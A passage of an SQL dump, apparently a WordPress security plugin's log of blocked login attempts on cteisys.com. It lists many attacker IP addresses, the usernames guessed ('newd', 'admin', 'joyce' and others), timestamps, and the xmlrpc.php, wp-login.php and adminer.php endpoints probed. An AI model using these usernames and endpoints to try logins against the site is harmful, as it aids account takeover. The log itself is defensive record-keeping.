i4L3cYojrhT7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.104.66.61',795361853,'newd',0,1665310394.8686,152,'sjIB1YEG2JAlpaQfHrq0tNUO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.52.210',1364735186,'newd',0,1665309982.2332,152,'qLTQSJc4PA63K1bYyHXZi9pI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.178.136.33',867338273,'newd',0,1665309976.8542,152,'u0iDKcHZyMBgdTShE1QAkstU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.126.36.87',226370647,'wwwadmin',0,1665316527.4161,51,'rzg5lMEDR73yJKNnvLTUYwj4','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('91.214.169.69',1540794693,'joyce',0,1665316158.3251,152,'ZU3ltKLT70kO2mFMH5engId4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.215.217.77',2732054861,'wadminw',0,1665315756.5981,51,'Zd3srV7SbELkl2vWtyN0h58U','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.172.168.111',2813110383,'admin',0,1665315236.4165,51,'vAQE68D7Htqg9F2ZaoP1IjbS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('74.208.103.228',1255172068,'newd',0,1665315096.4474,152,'yicp57RatqGWX4CgEx8QnF9w','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.205.115',2160577907,'newd',0,1665315082.4390,152,'EknGgr9hRoU1NYKjTtAB7IPv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.99.54.31',2808296991,'newd',0,1665314725.7006,152,'zcWBGJQEsUNy2MbrKkRPDxTS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('171.244.17.110',2884899182,'newd',0,1665314678.2418,152,'MJFpveKhP8yR2qg4NuB9sGfx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('3.34.104.242',52586738,'newd',0,1665314288.3095,152,'Y5skzJNugDZxTSrwPavF8oKE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.101',3583549797,'joyce',0,1665314288.2199,152,'09IXxOVHrQdUMSj4Z12szbmA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.126.36.87',226370647,'newd',0,1665313904.6740,152,'4B0lTgNerIX3jvPiMoGVSD7L','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('212.38.40.215',3559270615,'newd',0,1665313900.3862,152,'pgutcbZm47h3RN8HlnvxfsJE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('137.184.209.117',2310590837,'newd',0,1665313514.3209,152,'Di76JmwNgZjs8vLRXdunF5Q3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.174.248.107',3652122731,'admin',0,1665320500.8836,152,'fgBvDzCUPpE9iM5qSJu3x6VQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.210.66.35',533873187,'admin',0,1665320500.7282,152,'GKiuzs43jF0oeRaJMBf7XYcU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.145.126.115',3230760563,'joyce',0,1665320308.4552,152,'lKQJHDwgf8qB5n7xrd9VStiO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.97.88.147',2707511443,'wwwadmin',0,1665319680.7794,152,'Ok6dwCtxioRgJz5UqZ1BIjD7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('138.68.180.230',2319758566,'admin',0,1665319301.7032,51,'ktwJLhfdc8WauETZzrVmoRxp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.169.177.64',3232346432,'wadminw',0,1665319250.4639,152,'CRBpU7Jy5Eszc4mKqe8QVDft','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('118.98.64.188',1986150588,'admin',0,1665318716.6494,152,'rugdWXTa3QpbCc5UtP0BZhFs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.92.159.48',3193741104,'admin',0,1665318716.6481,152,'xXv5wNb63zVqmC8OUcnhTMpR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.207.163',2487799715,'admin',0,1665317280.9071,51,'C0dnaE1Zb2l8hPKvNFYzRLBo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('77.240.13.186',1307577786,'newd',0,1665325485.2408,7,'1ZYeuT2Ek3HGR7Jvp80OAQ9C','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('190.169.30.9',3198754313,'wwwadmin',0,1665323843.9206,152,'oXyaRqHZMJUY8gIwsEmGFiKn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('1.117.250.215',24509143,'newd',0,1665323406.7910,7,'R1fpZmXN4vwqlzsWD5u0kTGE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.178.136.33',867338273,'wadminw',0,1665323372.2200,152,'rhRILls63cBSQTF7k0KGfEYn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.104.173',2994759853,'wadminw',0,1665323366.6123,152,'4x5rWEkdCGbwaZiIcBYSLFQ9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.115.107',2733732715,'wwwadmin',0,1665322312.0158,51,'0yDAudJgHfWsn6EpaR8iLQoO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.241.115.107',2733732715,'wwwadmin',0,1665322311.8228,51,'M5gzQUxl1oOyVpjbk9ri07C2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('128.199.205.115',2160577907,'wadminw',0,1665321469.5493,51,'EbGY3el5oQywaTU6k12vJFVL','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.59.165.88',3258688856,'wadminw',0,1665321436.1494,51,'8kZbiYHWzlQusD3XCpLR579B','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('13.79.17.158',223285662,'admin',0,1665321376.4534,51,'szwVFQDiGfAEBMYJhOuo8CU2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.210.251.22',869464854,'newd',0,1665327767.4211,152,'Jenkd9873PiVwv06AyfSpLNl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.211.94.153',601054873,'newd',0,1665327767.4209,152,'wzf3cUAW0gyqTs4ejH7hNlJb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.130.218.178',1736628914,'newd',0,1665327544.3699,7,'Oj9IGbqMuNveDYAcxTSyVw5W','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('95.173.161.171',1605214635,'newd',0,1665327287.5044,152,'dWfuiO2GzZkJVX5smYHKp69L','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.233.67.171',3270067115,'newd',0,1665327285.9884,152,'KQP2IT8qCJMowkSFiE5vR4e7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.50.19',3328324115,'newd',0,1665326888.5777,152,'k5DCtnf7PjLOuBhgFNc1XHb8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('122.17.148.164',2047972516,'newd',0,1665326835.3596,152,'avfGIEXsu76MH0VktBhgxSdi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.223.186.76',2682239564,'admin',0,1665326376.7285,152,'Qf0dxGtz7gjOAprXhCTsVe6w','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.213.170.208',601205456,'admin',0,1665326342.7339,152,'tZepkonSEaYhD7dc82IBWLbU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.126.36.87',226370647,'admin',0,1665325925.4103,152,'sPynZFzvhNa4uircq213OxMY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.126.46',2733735470,'admin',0,1665325925.4068,152,'tahzr8oBvCMg3WHZY9nKVF1j','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('39.106.15.209',661262289,'newd',0,1665331072.3607,152,'35mKNk8jEiewDqJUMY1sBGQR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'newd',0,1665330570.2101,152,'7ZFtHuUP3vxGDkhMV9NlmXdp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.176.230.188',3249596092,'newd',0,1665330570.2096,152,'naW7D9p0FKRAwtz83L5QYqP4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.167.34.14',1218912782,'newd',0,1665330160.4856,7,'BeW8g7TpLzojrk4DGXPKvJx6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('143.198.161.19',2412159251,'newd',0,1665330090.6844,152,'pTEBlZu6arC9iFQNLwd7hosS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.219.251.247',1759247351,'newd',0,1665329638.7694,152,'JkuUe5qpE17fBvP6zb2tYQMG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.210.251.22',869464854,'newd',0,1665329630.3759,152,'W8eU9ogRiELp0JKaxA1mDhl3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.244.53',2487809077,'newd',0,1665329149.4518,152,'Sl1kNPiRzMUWZ6FsbQ2vHVEK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('187.32.188.214',3139484886,'newd',0,1665328702.5239,152,'NFo7jhVgfv1w3qTZAXyCcEbx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('177.52.160.32',2973016096,'newd',0,1665328243.4631,152,'WH3GJCsq2PRSvrykbwgjN9ZY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.169.30.9',3198754313,'newd',0,1665328231.8259,152,'ZcxyCLE1dgmWTKv3orjDwSQ2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.113.171.103',3497110375,'newd',0,1665334775.0045,7,'nkqEDBurl9VRdNaFmtb8H04A','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('175.178.125.173',2947710381,'newd',0,1665334334.1709,7,'pXU4i16G0Dsh7dIYuwTgWbJE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.203.120.246',2680912118,'newd',0,1665333753.4816,7,'9c4z8KXZQEawYJvNnFfjMxmq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.172.168.111',2813110383,'newd',0,1665332717.4003,7,'5UpG2uDOTQsL7zdqSgRk9ZIW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('175.178.125.173',2947710381,'newd',0,1665332277.1948,7,'IalEYxL3wB569ikrbfqptPe0','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('115.79.139.135',1934592903,'newd',0,1665331653.4646,7,'ms3VNWwiAzUk80Tj95O6ZuGp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('2.184.67.138',45630346,'newd',0,1665331548.3158,152,'zLJ2PSGDgVWHeQ3BEXmCKT1M','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.29.138.73',1109232201,'newd',0,1665331536.9592,152,'1bYKxVCjcWFykSfJ96O3l7Bv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.141.164',2806484388,'newd',0,1665331224.4171,7,'ze4ZBS6GFh8iTA2xMwYOJ10D','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.30.89.51',3223214387,'Joyce',0,1665338397.5493,152,'P2uT1e4bgGLJykivNndzVB6o','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('143.244.155.35',2415172387,'newd',0,1665337882.7923,7,'SzDodvt1l7uAVTQcnhHJj9bB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.93.203.156',2388511644,'newd',0,1665337446.0570,7,'CVoIRXxFuB9gtMbSYQ3ZJer4','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.255.81.60',872370492,'newd',0,1665336858.0829,7,'iTFwJOI9Kh7vEW8ZRfCtuHbd','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.89.109.117',2673438069,'newd',0,1665336425.9552,7,'A91vahfCjrNtFTbQzegkLBs8','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('207.188.157.79',3485244751,'newd',0,1665335832.7327,7,'b6PGAq5zmhVXEBuJZ7Friec3','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('173.236.184.116',2917972084,'newd',0,1665335374.3077,7,'kD4wOIZyWzHpJerE3mPtNqVT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('184.75.221.163',3091979683,'Joyce',0,1665334947.1331,152,'Y2khsNWrbUuxOdC0LvGT81EP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.46.81.19',3324924179,'newd',0,1665342539.7278,7,'R4phmvTVw9cxSuIUzn5MANP2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.130.218.178',1736628914,'newd',0,1665341970.9576,7,'Be5FOSlH7wa3MyJmptGoXx6R','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('54.36.182.160',908375712,'newd',0,1665341553.2465,7,'edF49xXaRAbn3lWzDimqJkYG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('125.227.127.195',2112061379,'newd',0,1665340546.4163,7,'3fLmo1RKEcSDTBW6VdHrxP0h','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('121.243.95.160',2045992864,'newd',0,1665339960.8159,7,'Hcp8VJhiUMTWxgAGouQF9zKY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('138.68.180.230',2319758566,'newd',0,1665339519.7855,7,'hCZNcnKkBTGDqHIoVg50Oat3','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('207.46.234.202',3475958474,'newd',0,1665338918.8774,7,'UPXhWg8spKFAnqwBtYaf23ir','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('150.109.148.216',2523763928,'newd',0,1665338473.1989,7,'QGHN8mv1WJERFfYizOXutdck','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.113.180.18',3497112594,'newd',0,1665345935.0385,7,'IZx7NhOeHMvwrXEzyuSq6tTg','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.196.200',1168360648,'newd',0,1665345522.6327,7,'sFUBS8tcvmfAh67lGxkW1LOn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('45.162.228.171',765650091,'Joyce',0,1665345117.6652,152,'LzYNUv0s1Jn43eFh5PCROTmQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('23.99.229.218',392422874,'newd',0,1665344948.1656,7,'Vd0TM4HU9LPJF1o3wYzGBt5s','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('202.29.236.140',3390958732,'newd',0,1665344526.0516,7,'t59MJcjkPwh6NHXfRUombK3T','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.71.234.124',2806508156,'newd',0,1665343952.7125,7,'FB6duE5Vj8C3sOMZQIhq9gpX','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.98.48.183',3328323767,'newd',0,1665343706.8456,152,'Hb5J8Rq0tPVj6iogN3phdSaL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.110.72.238',795756782,'newd',0,1665343532.9764,7,'pLSx5rdl9I6M7jhWFPtusJT1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('64.225.65.31',1088504095,'newd',0,1665342961.5107,7,'mG4YXvtFagNSCO8T3x1bopuB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.131.68.19',1753433107,'newd',0,1665348987.5642,7,'vWeaGBhp0P7yrqIbVwNf32Qj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('77.65.213.168',1296160168,'newd',0,1665348555.5554,7,'hdvOM7J6TsLyNl9HX4bFP5ZW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.166.225.235',3165053419,'newd',0,1665347981.0626,7,'6PZQ1dv9n5q3RyGmfNhpDFWA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('68.183.71.174',1152862126,'newd',0,1665347550.5649,7,'4IuHmhlsV5Zp1GJXwPfvRCQy','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('207.46.234.202',3475958474,'newd',0,1665346956.2186,7,'A84o9DuUKgTcLNqdlCZa6kbM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.93.203.156',2388511644,'newd',0,1665346532.7954,7,'Shl9RwYypTo6Pqc5V2XZ3Hbu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.68.76.32',574901280,'newd',0,1665352615.4980,7,'w8FWCIyiZmTgGHYj4NKDcaAv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.2.4.134',3103917190,'newd',0,1665352018.2756,7,'EoqDdpB9lxnKLUkuGrmveCws','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('101.99.95.162',1701011362,'newd',0,1665351886.2888,152,'Lu1o6b902xHydejp5IC7zhrm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.79.17.158',223285662,'newd',0,1665351597.1074,7,'uAiCEaQelh2v5TSnJyZKWUDm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.210.53.165',869414309,'admin',0,1665351356.0151,152,'2sN639YPGcfihkTt8gnzvaI4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('145.239.30.120',2448367224,'newd',0,1665351021.2258,7,'aLzK6Xq0CRmYhVMP1soD3UnG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.154.177.165',1738191269,'admin',0,1665350873.6966,152,'Xus1cWIJab8FtlyHZjCMrAne','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('136.243.19.225',2297631713,'newd',0,1665350577.7800,7,'USv2Zb97YKWdXrGaAy6LmVf5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('202.21.38.119',3390383735,'newd',0,1665350009.4008,7,'5HAKQBJai4lYrCop0nyIEhb6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('77.65.212.122',1296159866,'newd',0,1665349579.9319,7,'ctypvuqeJ3P4U1S59KBnXbAZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.49.20.77',3107001421,'newd',0,1665356332.0222,152,'pyMH3jRLqSdkogZerT2ibXQn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('146.70.115.219',2454090715,'joyce',0,1665356300.8532,152,'My9b5E4wjHOvRFaeLzdNro7q','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('195.178.120.27',3283253275,'newd',0,1665356086.7912,152,'aEmLDb73AMiQ4x9sjzVnkpNf','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('119.237.81.29',2012041501,'newd',0,1665356078.6899,7,'VHKf9a2LZTbv5IjEe6GwqXsl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.221.220.140',1742593164,'newd',0,1665355771.5454,152,'sLKwyfmRzajA2k6Y3i4IcWG5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('1.117.250.215',24509143,'newd',0,1665355074.2945,7,'i7tPS18MhTEwuJv9ZsHBWk4G','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('13.78.225.32',223273248,'newd',0,1665354630.4359,7,'SH2Gvli0ahmNdryR4OnfkP3W','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('184.168.121.5',3098048773,'newd',0,1665354612.9843,152,'2tUn8ZHoJOXFNg9vsrumcM1z','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.12.254.32',3322740256,'newd',0,1665354055.9056,152,'Y83eZLVEOxqn4XfghPb2kABK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.130.218.189',1736628925,'newd',0,1665354055.8778,7,'kgAs8Zvt20SdbeCHUD9ifaXx','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('94.231.86.20',1592219156,'newd',0,1665353610.6040,7,'bEHxk2uMmvrsw4lTUqX03JSA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.90.232.106',1734010986,'newd',0,1665353485.7110,152,'9NIz5BTWKV6vMRnUZ8SHPuoX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('146.148.44.185',2459184313,'newd',0,1665353029.5881,7,'gfyv9inEZ7ONbVRFqKWTDSIC','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.146.202.150',1737673366,'newd',0,1665352933.9554,152,'bRwX7FDtiJTrjnYlmeCovscE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('90.156.169.12',1520216332,'newd',0,1665359861.3379,152,'TvMwxpkFf74ugyXVh8OZlm3n','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.113.153.235',3497105899,'newd',0,1665359722.4591,7,'2soV61Oi4DFuTJCbyzBLapEA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('80.77.135.125',1347258237,'newd',0,1665359238.5930,152,'Xp81Lvr7fS5ZyMRmgbkQNa3x','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('147.135.255.8',2475163400,'newd',0,1665359124.8373,7,'GrendphzIcsZko1A0T6KmYCy','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('45.83.220.178',760470706,'',0,1665358877.7623,55,'EMHQhnDP2aTFZyrCsxuUN0Yk','','19|0|0|0|cteisys.com/adminer.php',0,19,0),('142.93.41.19',2388470035,'newd',0,1665358694.9538,7,'Odx5UYSysp0ViuC4IzaEeX87','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('87.106.229.31',1466623263,'newd',0,1665358677.9610,152,'Br6R5mlDQitJKyWvg7LT3E8p','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.111.116.44',795833388,'newd',0,1665358106.2621,7,'ASiT6nOdkJ7Rep9K5XWwhUvD','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.183.122.143',3115809423,'newd',0,1665358077.4343,152,'PENlFrUQ6S3kmsaJhcuCMA8L','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('205.185.116.156',3451483292,'newd',0,1665358054.3345,152,'kuUjYH5tXdrR7nIiqLCleZpm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.170.36.88',581575768,'newd',0,1665357681.4827,7,'ZN8fjsDbSnMvPm26h7OgAoqu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('199.188.207.230',3351039974,'newd',0,1665357499.7857,152,'VcwdgOFUa5PuD6vXtmeHYb73','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.214.194',2487801538,'newd',0,1665357107.2460,7,'Fo3lGsdZYfm6HD14KEWvIS9R','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('161.35.126.102',2703457894,'newd',0,1665356671.0130,7,'iXSWnTLR80qNJx14Orw7v2Gc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('123.56.59.9',2067282697,'newd',0,1665363446.6915,152,'qXBfmyzZN0eduvL2Qc7hTYiV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.154.248.39',3483039783,'newd',0,1665363229.1964,7,'PmkZBpgEd4JSLvVuDx2bQlMG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('109.233.192.83',1844035667,'newd',0,1665362830.4746,152,'lC7O6FqnhMxwWJvobAzt3I8j','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.205.62.27',1137524251,'newd',0,1665362790.8028,7,'4YqVhOB0Em1JnDb386csp5ar','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('149.248.59.66',2516073282,'newd',0,1665362216.0656,7,'7eGFdTRVBgWx4hfjDMOcNA98','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('128.199.109.135',2160553351,'newd',0,1665362216.0336,152,'jbolBJEYm8MraUdiPzZ79vWQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.217.129.44',1608089900,'newd',0,1665361763.6244,7,'bMnUvHSxqs6mgPtKpORfJXyu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('95.217.147.17',1608094481,'newd',0,1665361633.3985,152,'tDkiMKRdw43hEQ59froj6pgs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.32.228.70',773907526,'newd',0,1665361192.4519,7,'0r2oiE6QPtWCMRfcqwj9K8kH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('13.78.225.32',223273248,'newd',0,1665360751.9945,7,'goUzWy2fMXtqnxr1KZOSHT5s','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('150.230.247.143',2531719055,'newd',0,1665360459.0082,152,'L0YlpN9ZD3HbyfxUszhTIwOq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('136.243.19.225',2297631713,'newd',0,1665360163.0610,7,'r9Nc04LQMdJ6Fn3IblEOgs5a','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('131.72.236.73',2202594377,'newd',0,1665367211.5005,152,'GQpx30s7SLkachUwF4WbToM2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.255.81.60',872370492,'newd',0,1665366930.5203,7,'HKfJtFpmWzh6RvMcLgU3COuA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('72.34.62.119',1210203767,'newd',0,1665366569.5457,152,'pOUT8x1JvGbKNYhz9QXBEru7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('138.68.147.16',2319749904,'newd',0,1665366337.7267,7,'hSb6arDABx4v5PlmCXuGYF2N','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('13.237.121.70',233666886,'newd',0,1665365919.9388,152,'OTsX1eHGjF3NvZ5B7JmEnpcu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.165.198.224',3164980960,'newd',0,1665365902.8542,7,'vWl7G0byXLHsRQ2FSz8DZYPt','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('138.68.180.230',2319758566,'newd',0,1665365309.4205,7,'GUOJqLa4NKB6HXbQ30d8xhwR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.2.4.134',3103917190,'newd',0,1665364871.0049,7,'b4e0fagk5i6tCOqjxdWXspwc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.71.111.16',2806476560,'newd',0,1665364709.9657,152,'CuqOT7iQSa23NjlV5G8FnMm4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('146.148.44.185',2459184313,'newd',0,1665364261.0451,7,'acS2wkihsXjM3xWL764BNUr1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('184.75.223.211',3091980243,'Joyce',0,1665364230.1702,152,'0xOmvEK3nRz7aGJ2Fpuw6dgX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.145.50.127',1737568895,'newd',0,1665364080.4520,152,'mKVyQRqWY1nrNbzTc7k9hsaB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.255.81.60',872370492,'newd',0,1665363836.7950,7,'YJxkX2f7tyVeRGuFPBKQo1L0','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.252.31.59',3120308027,'newd',0,1665368493.4526,152,'RKOJvUmCxdnB4WiMXwY9rlL2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.130.218.178',1736628914,'newd',0,1665367963.8037,7,'8FwioD5aIQhV3MzlE2SG6kgc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('31.210.66.35',533873187,'newd',0,1665367845.6599,152,'qFM19kSVWyPpLQahlm5H4ADJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('123.25.21.16',2065241360,'newd',0,1665367369.6649,7,'o8blGFC0EncZyqV7eBjxJDup','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('149.56.26.54',2503481910,'newd',0,1665372064.4028,7,'oJY1HBSyTM6IN3XbCl0tE578','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('66.29.138.73',1109232201,'newd',0,1665372008.3633,152,'PhBaJnWblk1DF76VKictpLuX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.34.62.119',1210203767,'newd',0,1665371542.1141,152,'bBvaGTH5iNnyD84JFtuq6cKZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('75.119.157.181',1266130357,'newd',0,1665371489.2938,7,'FcbsmlhCKxM96025rX4RBwEZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('150.109.148.216',2523763928,'newd',0,1665371051.5520,7,'u9Xz1qnRp5DPUvte6JWTbOxi','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('13.237.121.70',233666886,'newd',0,1665370945.2348,152,'wE4mAvPO5eaCVG1tHY73z6Mj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('122.17.148.164',2047972516,'newd',0,1665377989.0189,152,'mkYM9FfcsPUaOvloL1ErAuzy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.91.83.187',861623227,'newd',0,1665377765.7934,152,'1H45izuGxgom6nyJhZIY9DpQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.46.85.155',3324925339,'newd',0,1665377580.7418,7,'GC3AY0cqhEmdJD5f6F1OQgM2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('195.225.76.130',3286322306,'newd',0,1665377270.0659,152,'Mq4yjDsiGc2FJfmWOwt7neAB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('36.94.142.166',610176678,'newd',0,1665377158.1741,7,'Ugj4kz8eSOPqQJNM260hKHdC','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.241.126.46',2733735470,'newd',0,1665376750.3966,152,'kWTc461f2nxJXwqA8CmjVlNB','','0|0|0